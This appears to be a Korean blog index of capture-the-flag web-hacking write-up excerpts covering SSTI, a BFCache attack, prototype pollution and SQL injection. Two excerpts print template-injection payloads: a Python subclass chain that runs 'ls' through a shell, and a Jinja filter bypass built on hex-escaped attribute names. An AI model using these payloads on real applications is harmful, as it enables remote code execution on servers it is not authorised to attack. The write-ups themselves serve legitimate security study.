Web

Hacking Web

[WEB] Calculator (SSTI)

계산기가 있다. render_template_string을 쓰고 있다. → SSTI!! ‘ ” _ [ ] , ` sys os flag % class config […]

Hacking Web

[WEB] I can Read! (SSTI)

  render_template_string을 쓰고 있으므로 ssti임을 알 수 있다. 7*7을 넣어보면 49가 나온다. ‘’.__class__ ‘’.__class__.__mro__ ‘’.__class__.__mro__[1] ‘’.__class__.__mro__[1].__subclasses__() ‘’.__class__.__mro__[1].__subclasses__().__getitem__(398) ‘’.__class__.__mro__[1].__subclasses__().__getitem__(398)(’ls’,shell=True,stdout=-1) 까지 순서대로

Hacking Web

[WEB] Jinjja (SSTI)

메모가 있다. 여러가지 필터링이 존재한다. 게다가 args도 막힌다. |join으로 하는 것도 못한다. request|attr((’ar’,’gs’)|join)|attr(’a’)   request|attr(%27arx67s%27) g를 x67로 넣어주니 된다!!!! request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27)}}&c=_

Hacking Web

[WEB] BFCache attack

뭔가를 작성할 수 있는 노트가 있다. 작성하면 token이 생긴다. 노트에 img 태그까지 넣을 수 있다. 해당 url에 직접 접근하면 note의

Hacking Web

[WEB] pollute-me

  signup 페이지에서 회원가입을 할 수 있다. 이름, 나이, 학교 이름, 학교번호를 넣을 수 있다.   위는 회원가입 페이지에서 post

Hacking Web

[WEB] Sign (sql-injection)

Sign 페이지이다. 회원가입, 로그인을 할 수 있다. flag.php flag를 확인할 수 있는 php이다. is_admin이 1이면 flag를 확인할 수 있다. signup.php

위로 스크롤